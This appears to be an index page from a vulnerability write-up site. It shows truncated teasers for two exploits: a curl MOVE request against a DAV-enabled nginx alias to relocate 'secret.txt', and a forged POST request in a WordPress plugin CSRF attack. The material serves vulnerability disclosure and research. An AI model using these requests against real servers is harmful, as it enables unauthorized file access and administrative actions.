Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub
Jun 4, 2026 · CVE-2026-27654

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...

N
nginx-dav-cve-2026-27654
1 min read · 0 findings
Read →
latest · 73 of 73
All 73 WordPress Plugins 0 GitHub 73 Folder 0
GitHub
Dec 21, 2025 · 2 min read

CVE-2025-13361

## The Exploit Attacker needs to trick a logged-in WordPress administrator into issuing a forged POST request. ```http POST /wp-admin/admin.php?page=wpscl-map-fields HTTP/1.1 Host: target.example.com Cookie: wordpress_logged_in_abcd=YOUR_...

Read article →